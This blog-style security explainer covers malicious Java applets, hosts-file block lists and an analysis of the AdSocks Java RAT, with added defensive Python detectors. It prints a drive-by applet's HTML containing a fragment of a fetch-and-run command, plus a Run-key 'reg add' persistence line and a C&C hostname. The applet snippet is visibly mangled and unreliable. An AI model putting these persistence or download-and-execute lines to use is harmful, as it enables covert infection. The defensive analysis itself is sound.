AdSocks RAT — about the new Java trojan computer viruses

The programs that run on our computers are, from the point of view of their code, of two main types: compiled and interpreted. Compiled programs are those that undergo a transformation from the source code written by the programmer to machine code, which consists of instructions that the computer's CPU can execute directly; that is why it is sometimes called native code. This transformation is done by a compiler. Programs written in C, C++, Delphi or Pascal, for example, are compiled programs and, thanks to the native code produced by the compilers, have the fastest execution speed.

Interpreted programs, also called scripts, require an interpreter installed on the host computer, which is invoked at run-time to generate machine code from the source code. The interpreter is invoked each time the program (or script) runs; it reads the source code statements or commands one by one and "translates" them into native code in real time to be handled by the CPU. This kind of program has the lowest execution speed, and you can see why: even a simple script generates a notable amount of activity in the computer. Examples of well-known interpreted programming languages are PHP, Perl, Ruby and ASP.

When I say that programs written in these languages have the lowest execution speed, I do not mean that they must be avoided. Interpreted programs play a tremendous role in certain areas; these days the Web cannot be imagined without PHP. PHP, together with ASP, is the foundation of blogs, forums and other types of websites. One of the biggest advantages of scripting languages is platform independence: once the proper interpreter is installed, a script-based program can run on any operating system.

Trying to combine the advantages of a compiled program with those of an interpreted one, developers designed an intermediate form into which a computer program can be compiled. Languages such as Java, developed by Sun Microsystems, a subsidiary of Oracle Corporation, or the .NET languages developed by Microsoft, use an intermediate type of compilation: the compiler's output is so-called virtual machine code, and a virtual machine is required to do the final transformation from that virtual machine code into native code for each computer architecture. In our examples, these "virtual machines" are the Java Runtime Environment and the Microsoft .NET Framework respectively. The main advantage is fast execution speed, while platform independence is still kept.

Malware can be produced in any programming language without exception and for any operating system, but the languages most preferred by malware creators are obviously the most widely used ones. Since the vast majority of computers have the Java Runtime Environment installed, it is clear why there are many more malicious PHP scripts, JavaScript and Java trojans in the wild than, let's say, malicious Python or Perl scripts.

JavaScript is used for a zillion tasks on websites, from tracking visitors to adding various functionality to the site, building embedded graphical objects in the web page and so on. Many of these tasks are executed invisibly to the user, who is not aware of what is happening backstage when a web page is loaded and all the scripts contained in the page's HTML code are executed. Almost every browser has an option to disable JavaScript, and there is a Firefox add-on named NoScript that blocks scripts from being executed, but that alters the browsing experience somewhat and is not an acceptable option for the majority of users.

There is another option to protect yourself from malicious scripts: use services like AVG LinkScanner, McAfee SiteAdvisor or the Dr.Web anti-virus link checker, a Firefox add-on. Other services use community ratings to establish whether a website is safe or not; see the Web of Trust browser add-on or URL Void. URL Void also has a reliable web page scanner based on multiple antivirus engines.

Many of these site advisors use the malware domain lists provided by specialised crawling and scanning services. One such "crawling & scanning" service is malwarepatrol.com; the lists it provides are free to use for non-commercial purposes. Along with the automated crawling system, users can also submit suspicious domain URLs to this service for analysis and monitoring. At a higher level in the network infrastructure, for example at ISPs or gateways, administrators can use malware domain lists to block access to these domains, with a web filter for example.

The malware block lists come in different formats covering many application needs; one of the most interesting for average users is the hosts file provided for Windows systems and MacOS.

The hosts file in all Windows versions, including Windows 7, has the following path:

%systemroot%\system32\drivers\etc\

It is a simple text-based file and is used to bypass the DNS requests made by the system, a kind of "automatic redirection".

For example, if you add a line to this file with a text editor (notepad.exe)

127.0.0.1    blockeddomain.com

and try to navigate to blockeddomain.com, you will see that it is not possible. The web browser will not make any DNS request to find out what blockeddomain.com is; instead it will navigate "blindly" to 127.0.0.1, which is the loopback address, meaning your own computer.

In conclusion, if we replace our hosts file with the one provided by a security service like malwarepatrol.com, updated hourly, all requests for a malicious domain will be blocked, or better said, redirected to your own computer.
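To see what a hosts-format block list actually does before dropping it onto a system, it helps to parse it the way the resolver does: one address per line, one or more hostnames after it, comments after "#", blank lines ignored. The following Python is an added example, not part of the original post or of any block-list provider's tooling; the list it parses is a constructed sample, and the set of "sinkhole" addresses it treats as blocking is this example's own assumption.

```python
"""Parse a hosts-format malware block list and check domains against it.

Added example; SAMPLE_HOSTS is a constructed list, not a real feed.
"""
import ipaddress

# Constructed sample in the hosts file format (not a real block list).
SAMPLE_HOSTS = """\
# Malware block list, hosts format (constructed sample)
127.0.0.1    localhost
127.0.0.1    blockeddomain.com        # one entry per line
0.0.0.0      evil.example.net  www.evil.example.net

# tabs are accepted as separators too
127.0.0.1\tbad.example.org
"""

# Addresses that a block list uses to "redirect to your own computer".
# Assumption of this example: anything pinned to one of these is blocked.
SINKHOLE = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_hosts(text):
    """Return {hostname: ip} for every mapping in a hosts-format file.

    Comments (#...) and blank lines are skipped; a line may map several
    names to the same address. A malformed line raises ValueError with
    its line number, so a bad feed is rejected rather than half-applied.
    """
    mapping = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            raise ValueError(f"line {lineno}: expected '<ip> <name>...': {raw!r}")
        ip = parts[0]
        ipaddress.ip_address(ip)  # raises ValueError on a malformed address
        for name in parts[1:]:
            mapping[name.lower()] = ip
    return mapping


def is_blocked(mapping, hostname):
    """True if the hostname is pinned to a loopback/unspecified address."""
    return mapping.get(hostname.lower().rstrip(".")) in SINKHOLE


def blocked_entries(mapping):
    """Names pinned to a sinkhole address, excluding the usual localhost line."""
    return sorted(n for n, ip in mapping.items() if ip in SINKHOLE and n != "localhost")


if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_HOSTS)
    for name in ("BlockedDomain.com", "www.evil.example.net", "example.com"):
        print(f"{name:25} blocked={is_blocked(hosts, name)}")
    print("entries:", blocked_entries(hosts))
```

The lookup is case-insensitive and strips a trailing dot, matching how hostnames are compared; note that a hosts entry only matches the exact name listed, so a list that blocks blockeddomain.com does nothing for a subdomain unless that subdomain is listed too.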

You can find many malware block lists on the Internet; the most complete I was able to find is the one provided by clean-mx.de, which is a collection of lists submitted by other crawling services, including clean-mx.de's own, NetPilot.

However, keep in mind that there is no 100% reliable solution for protecting your computer from malware infection, considering that new malware appears every minute.

One of the most infamous methods of infecting computers is the Java drive-by applet.

Java applets are small executables used to add new features and dynamics to websites, to make them more attractive and "eye-catching", so they are intended to run in web browsers and require the Java plug-in. A good example of Java applets in use are some online games. Some good security rules apply to applets: they run in a browser "sandbox" that prevents access to system files, other programs, shared libraries and the operating system clipboard; generally speaking, access to the user's files and local processes is restricted. Applets are allowed to open network connections only to the server that loaded them into the web browser.

If an applet is digitally signed with a certificate issued by a certificate authority, the security model changes a bit: the applet is treated like any other program by the operating system.

The real threat from malicious Java applets comes from the self-signed ones: applets signed by their own authors, with no way to verify the information provided in the signature. When they run, they trigger a security alert:

The application digital signature cannot be verified.

Do you want to run the application?

This security message also shows the name of the applet, the publisher and the originating server. In the case of a malicious Java applet, this is where social engineering comes into play: the hacker will self-sign the applet with some well-known and trustworthy software company, such as Microsoft, as the publisher, trying to trick the user into running the application. Another common technique is to use Java applets with:

height=1 pixel

width=1 pixel

or even zero (0) pixels as dimensions, that is, a "no window" Java applet. The general category of malicious Java applets is the trojan downloader: a Java applet cannot wreak too much havoc because of the security restrictions imposed on it, but using some programming tricks and the "help" of the innocent user it can download and run some very aggressive and dangerous trojans.

In a typical Java applet attack, the hacker sets up a web page embedding the applet in the HTML source, uploads a real trojan to a file hosting service and tries to drive as much traffic as possible to the "infected" web page. Analysis of a known malicious Java applet revealed that the applet drops and runs, in the system's temporary folder, a Visual Basic script (.vbs) file and a downloaded trojan. This is how the original web page HTML looks, just to give you an idea:

<style type=text/css>
body {
background-color: black;
}
#box {
border: 2px double white;
font-family: Verdana;
margin-right:160px;
margin-left:160px;
background-color: white;
}
</style>

<body>
<br><br><br><br>
<div id="box">
<applet width='500' height='500' code='Client.class' archive='Client.jar'>

<param name='windows2' value="><param name='unix1' value="">
<param name='unix2' value="">

-O- | sh">
<param name='linux2' value=""></applet>
</div><center>
<img src="softpedia.gif" />
</center>
</body>

If the visitors of the web page "trust" the fake publisher and run the application, the result is obvious: a computer infection with update.exe, see the code above.
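On the defender's side, the same markup features the post describes (an applet tag pulling a jar, and the 1x1 or 0x0 "no window" trick) are easy to spot when a page is scanned before it reaches the browser, or in a proxy log of fetched HTML. The Python below is an added example, not code from the post or from any of the products mentioned; the sample page is constructed (it reuses the 500x500 applet tag shown above, which is not hidden, next to two constructed hidden ones), and the threshold of one pixel for "hidden" is this example's assumption.

```python
"""Find Java applet tags in HTML and flag tiny/hidden ones.

Added example; SAMPLE_HTML is constructed for the demonstration.
"""
from html.parser import HTMLParser

# Constructed page: the visible applet from the post plus two hidden ones.
SAMPLE_HTML = """
<body>
<div id="box">
<applet width='500' height='500' code='Client.class' archive='Client.jar'>
<param name='windows2' value=''></applet>
</div>
<applet code="Loader.class" archive="l.jar" width="1" height="1"></applet>
<object type="application/x-java-applet" width="0" height="0">
  <param name="code" value="X.class"></object>
</body>
"""

HIDDEN_MAX = 1   # assumption: 0x0 or 1x1 is the "no window" applet described above


def _dim(value):
    """Parse '500', '1px' or '0' into an int; None if absent or not numeric."""
    if value is None:
        return None
    digits = "".join(ch for ch in value.strip() if ch.isdigit())
    return int(digits) if digits else None


class AppletFinder(HTMLParser):
    """Collect <applet> tags and <object> tags whose type names a Java applet."""

    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet" or (tag == "object" and "java" in (a.get("type") or "").lower()):
            self.applets.append({
                "tag": tag,
                "code": a.get("code"),
                "archive": a.get("archive"),
                "width": _dim(a.get("width")),
                "height": _dim(a.get("height")),
            })
        elif tag == "param" and self.applets and self.applets[-1]["tag"] == "object":
            # <object> carries the class name in a <param name="code">
            if (a.get("name") or "").lower() == "code":
                self.applets[-1]["code"] = a.get("value")


def find_applets(html):
    """Return one dict per applet/object tag found in the page."""
    parser = AppletFinder()
    parser.feed(html)
    return parser.applets


def hidden_applets(html):
    """Subset of find_applets() whose declared size is at most HIDDEN_MAX x HIDDEN_MAX."""
    hidden = []
    for ap in find_applets(html):
        w, h = ap["width"], ap["height"]
        if w is not None and h is not None and w <= HIDDEN_MAX and h <= HIDDEN_MAX:
            hidden.append(ap)
    return hidden


if __name__ == "__main__":
    for ap in find_applets(SAMPLE_HTML):
        print(ap)
    print("hidden:", [ap["code"] for ap in hidden_applets(SAMPLE_HTML)])
```

A tag with no width or height at all is reported by find_applets() but not by hidden_applets(), since the browser would then apply its own default size; a real filter would treat any applet as worth a closer look and use the hidden flag only to raise the priority.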

As a recommendation, you can go to Internet Options > Security tab > Custom level; this brings up the Security Settings, where you can check the "Prompt (Recommended)" option under "Launching applications and unsafe files", or "Disable" if you are extremely concerned about your computer's security.

The more elaborate member of the trojan horse family is the RAT or Remote Administration Tool: a small, hidden server that runs at every computer start-up and connects to a Command & Control server, giving the hacker full rights on the infected computer. He can manipulate files and processes without restriction, view desktop screenshots, view the computer's webcam or steal the passwords saved by the browsers. The label "trojan horse" is contextual and comes from the fact that the trojan is very often installed without the user's consent, masquerading as a legitimate program or alongside a legitimate program, embedded in its installer file.

On the other hand, using a RAT for your own needs, for example installing it on a computer with the user's consent in order to troubleshoot that computer in the future or to download and upload files to it, means it cannot be considered a trojan in this very special case, but rather a little server.

Trojan horses can be produced in the Java programming language, as in almost any other. A good example of a Java trojan horse or Remote Administration Tool, created by a Spanish author, can be found at sourceforge.net; it is named AdSocks and is now at version 0.7.0.

Its features are:

  • Remote Desktop
  • Remote Command line
  • Download and upload files
  • Keylogger

This is the main interface:

[image: main_adsocks.jpg]

and this is the builder interface:

[image: builder_adsocks.jpg]

As you can see, the user can set the IP address to which the RAT must connect, the connection password, the port used, the name of the trojan dropped in the system root folder and the name of the registry entry used to run it at start-up.

Obviously, because it is a Java trojan, the server that is built has the .jar extension (server.jar) and is nearly 21 KB in size. When this is executed on the victim machine, another .jar file is dropped in the system32 folder with the chosen name for the trojan, where it will reside from now on, and an entry is added to the registry under the Run key (HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\run) for autostart purposes. Here is the report of the actions taken on the infected system; the name of the dropped trojan is IPlookup.jar:

[ Changes to filesystem ]
* Creates file C:\windows\system32\IPlookup.jar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\config27926261669765384483.thf
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\config5905168662080842625.thf

[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}
* Creates value "startin'up=C:\Windows\system32\IPlookup.jar" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\run

...

[ Network services ]
* Connects to "xx.yy.zz.aa" on port 5432.

[ Process/window information ]
* Keylogger functionality.
* Creates process "(null),reg add hklm\software\microsoft\windows\currentversion\run /v "startin'up" /t reg_sz /d "C:\Windows\system32\IPlookup.jar" /f,(null)".
* Creates process "(null),javaw -jar C:\Windows\System32\IPlookup.jar,(null)".
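The report above is exactly the kind of output a sandbox hands to an analyst, and the persistence pattern it shows (a .jar written into system32, a Run-key value pointing at it, "reg add" spawned to create that value, and javaw launching the jar) can be matched mechanically. The Python below is an added example, not part of the post or of any sandbox product: it parses the report into its bracketed sections and applies a few rules written for this demonstration. The report text embedded in it is a constructed copy of the lines shown above, with the same masked "xx.yy.zz.aa" address.

```python
"""Flag Java-RAT persistence indicators in a sandbox behaviour report.

Added example; SAMPLE_REPORT is a constructed copy of the report above and
the rules are this example's own, not any sandbox's built-in signatures.
"""
import re

SAMPLE_REPORT = r"""
[ Changes to filesystem ]
* Creates file C:\windows\system32\IPlookup.jar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\config27926261669765384483.thf

[ Changes to registry ]
* Creates value "startin'up=C:\Windows\system32\IPlookup.jar" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\run

[ Network services ]
* Connects to "xx.yy.zz.aa" on port 5432.

[ Process/window information ]
* Keylogger functionality.
* Creates process "(null),reg add hklm\software\microsoft\windows\currentversion\run /v "startin'up" /t reg_sz /d "C:\Windows\system32\IPlookup.jar" /f,(null)".
* Creates process "(null),javaw -jar C:\Windows\System32\IPlookup.jar,(null)".
"""

# Matches the autostart Run key regardless of the case the tool printed it in.
RUN_KEY = re.compile(r"\\currentversion\\run\b", re.I)


def parse_sections(text):
    """Split the report into {section name: [entry, ...]} using the [ ... ] headers."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = re.fullmatch(r"\[\s*(.+?)\s*\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
        elif current and line.startswith("*"):
            sections[current].append(line[1:].strip())
    return sections


def find_indicators(text):
    """Return (rule name, evidence) pairs for the persistence pattern in the report."""
    hits = []
    sections = parse_sections(text)

    # 1. A jar written under system32 is already unusual for a user-launched program.
    for entry in sections.get("Changes to filesystem", []):
        m = re.search(r"creates file\s+(.+\\system32\\[^\\\s]+\.jar)\s*$", entry, re.I)
        if m:
            hits.append(("jar dropped in system32", m.group(1)))

    # 2. A Run-key value whose data is a .jar: autostart via the Java runtime.
    for entry in sections.get("Changes to registry", []):
        if RUN_KEY.search(entry) and re.search(r"\.jar\b", entry, re.I):
            hits.append(("Run key points to a .jar", entry))

    # 3. The processes that implement (2) and then launch the dropped jar.
    for entry in sections.get("Process/window information", []):
        if re.search(r"\breg\s+add\b", entry, re.I) and RUN_KEY.search(entry):
            hits.append(("reg add to Run key from a process", entry))
        if re.search(r"\bjavaw?\s+-jar\s+.*\\system32\\", entry, re.I):
            hits.append(("java launched from system32", entry))

    # 4. The outbound connection the server opens to its controller.
    for entry in sections.get("Network services", []):
        m = re.search(r'connects to "([^"]+)" on port (\d+)', entry, re.I)
        if m:
            hits.append(("outbound C&C-style connection", f"{m.group(1)}:{m.group(2)}"))
    return hits


if __name__ == "__main__":
    for rule, evidence in find_indicators(SAMPLE_REPORT):
        print(f"[{rule}] {evidence}")
```

Each rule on its own is weak (plenty of legitimate software adds Run-key values), so a practical use is to score the report by how many of the four fire together; a jar in system32 plus a Run-key value plus javaw launching it is the combination that singles out this family.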

However, don't be so quick to download and try this program unless you know what you are doing. The first two files dropped in the temporary folder:

  • config27926261669765384483.thf     27.7 KB
  • config5905168662080842625.thf      35.8 KB

hide a dangerous mystery. The first file, viewed in a hex editor, begins with the letters PK, which means it is a zip archive; PK comes from Phil Katz, creator of the compression utility PKZIP. If you change the extension of the first file to .zip and try to unzip it, the result is 5 files and a folder named META-INF:

  • key.class
  • mensaje.class
  • svd$keyh.class
  • svd.class
  • uninstall.lib

Very interesting is the hex view of svd.class; here is a fragment of the hex editor window:

[image: hexview_adsocks.jpg]

As you can see, there is a very dubious URL inside the file:

http://ipl.dynupdate.no-ip.com and port 8245

Bear in mind this is not the address of the program's update server, so its presence in the code is very suspect. No-ip.com is a service heavily used by hackers to point subdomains to their computers' IP addresses; the explanation is that, since they have dynamic IPs, a domain name is used as the trojan's Command & Control server address instead of an IP.
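The two steps taken by hand above, recognising the renamed .thf as a zip by its PK header and then spotting a hostname inside svd.class, can be scripted so that every dropped file gets the same check. The Python below is an added example, not code from the post or from the AdSocks project: it builds a small constructed archive in memory (a fake svd.class containing the hostname and port quoted above, plus a manifest) rather than using the real files, then identifies it by magic bytes and pulls URL-like and hostname-like strings out of each member.

```python
"""Identify a renamed zip/jar by its magic bytes and scan members for embedded hosts.

Added example; build_sample_archive() produces a constructed stand-in for the
dropped .thf file, not the real AdSocks jar.
"""
import io
import re
import zipfile

ZIP_MAGIC = b"PK\x03\x04"   # "PK" = Phil Katz; local file header signature


def build_sample_archive():
    """Constructed jar: a fake class file carrying the hostname from the post,
    plus META-INF/MANIFEST.MF and an empty uninstall.lib."""
    fake_class = (
        b"\xca\xfe\xba\xbe" + b"\x00" * 8                       # class-file magic + padding
        + b"\x01\x00\x1ehttp://ipl.dynupdate.no-ip.com"          # UTF8 constant, 30 bytes
        + b"\x01\x00\x048245"                                    # UTF8 constant, the port
        + b"\x00" * 16
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("svd.class", fake_class)
        zf.writestr("uninstall.lib", b"\x00" * 32)
    return buf.getvalue()


def looks_like_zip(data):
    """The 'starts with PK' check done in the hex editor, on the first four bytes."""
    return data[:4] == ZIP_MAGIC


def printable_strings(data, min_len=4):
    """Runs of printable ASCII of at least min_len bytes, like the strings tool."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


URL_RE = re.compile(r"https?://[\w.-]+(?::\d+)?(?:/\S*)?")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def scan_archive(data):
    """Return {member name: sorted URLs/hostnames found}; members with none are omitted."""
    if not looks_like_zip(data):
        raise ValueError("not a zip/jar archive (no PK\\x03\\x04 header)")
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            hits = set()
            for s in printable_strings(zf.read(name)):
                hits.update(URL_RE.findall(s))
                hits.update(HOST_RE.findall(s))
            if hits:
                findings[name] = sorted(hits)
    return findings


if __name__ == "__main__":
    blob = build_sample_archive()
    print("zip header:", looks_like_zip(blob))
    for member, hosts in scan_archive(blob).items():
        print(member, "->", hosts)
```

The magic-byte check is what makes the extension irrelevant: a .thf, .dat or .tmp that begins with PK is still an archive. Strings pulled from class files are only a lead, as the post says; the no-ip hostname is suspicious because of where it appears (hard-coded in a class of a supposedly local tool), not because of the string match itself.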

This program, AdSocks, seems to be backdoored itself; it has questionable sections of code and is not recommended for use, or the "wannabe" hunter (i.e. hacker) may end up hunted. You have been warned.

Keep safe!
